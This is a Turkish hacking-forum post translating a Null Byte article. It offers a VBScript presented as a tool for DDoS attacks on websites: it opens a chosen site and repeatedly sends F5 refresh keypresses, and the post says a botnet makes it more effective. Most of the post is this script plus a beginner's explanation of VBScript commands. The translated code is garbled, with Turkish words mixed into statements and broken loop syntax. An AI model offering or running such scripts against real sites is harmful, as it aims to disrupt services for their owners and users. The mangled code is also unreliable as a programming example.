Ddos Saldırıları için VBScript/Bazı Komutlar/İscorpix/Dil Takımı

iscorpix

Kıdemli Üye
10 Eyl 2012
4,378
12
vbscript-for-ddosing-sites.1280x600.jpg

Merhaba arkadaşlar Ddos için VBScript yapıldı.Milisaniyede komutu yenileyen bir script tir.Ve bunu kaç kez yapmak isterseniz isteyin bu olay döngüsü uzayıp gider.Botnet ile daha da etkili , basit.

VBScript

( "Ne Sitesi")
Kod:
 Site = InputBox 
Set WshShell = WScript.CreateObject("WScript.Shell")
Return = WshShell.Run(Site, 1)

Yüklenme hızı

Kod:
Speed = InputBox
(milisaniye)

Kod:
MsgBox ( "zaman sayısı a ve vbNewLine Evet Infinative için vbNewLine &  Yeniden Veya kaç kez tekrarlanacak Infinative gönderilsinmi , vbYesNo + vbQuestion, "adres Veya ip") = VbY
es

Sonra

Kod:
'Infinative 
Inf = 0 
Do 
WScript.Sleep Hız 
WshShell.SendKeys "{F5}" 
Döngü Inf kadar = 1

Else
Num = InputBox ( "yenileme Kaç Kez olacak?" VbNewLine & "Sadece A Number(sayı) .", "Kaç Kez")
For i = 0 Num (için)
WScript.Sleep (Hız)
WshShell. SendKeys "{F5}"

VbNo Sıkıştırılmış yazıya

t 'End
"DDoS Done" MsgBox 1024, "Son DDoS Done"
End If

vbscript-for-ddosing-sites.w1456.jpg

Açıklama
açıklama yapacağız buradan sonra.

Komut

Bu komut dosyası script i yapmak için kullanılıyor.örnek olarak Reloading Of komut satırına sade ce Hız ı yazarsak hiçbir faydası olmaz. examens verilierini eklersek işler değişir.

Something Something Command =

Bu komut bir değişkeni ayarlamak için kullanılır.= karakterinden sonra siz olmasını istediğiniz nesne/nesneleri getirirsiniz , oldukça kullanılışlıdır.

Temeli;

Mesaj = InputBox ( "Mesajınız yazın")
MsgBox Mesaj
MsgBox Mesaj

InputBox () Komutu

Bu komut pop-up kutu yapmak için kullanılır.(xxx) şeklinde kullanılır.

If..then..else Komutu

Öze durumlarda bir şeyler/aktivite yapmak için kullanılır.
Kod:
Else-Tablolar End If

Örneğin bir aktiviteye cevap vermek istiyorum ;
Kod:
(MsgBox ise "Arkadaş  Olmak İster misin?", VbYesNo , "") = Sonra vbYes MsgBox ( "Evet biz arkadaşız", 1024, "")

gibi.

Kod:
MsgBox ( "Ben o Between Us Yani Wel gittiğini sanıyordum" Eh, 1024, "")

MsgBox Komutu

Mesajlar için kutucuk açmaya yarayan bir komuttur.

Kaynak: https://null-byte.wonderhowto.com/how-to/vbscript-for-ddosing-sites-0171535/

Mp8Q82.png

Çeviri bana aittir.

Moderatör tarafında düzenlendi:

iscorpix

Kıdemli Üye
10 Eyl 2012
4,378
12
Teşekkürler

Biz tesekkur ederiz

Isinize yaramissa ne mutlu bize

Teşekkürler

Ben teşekkür ederim

Moderatör tarafında düzenlendi:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.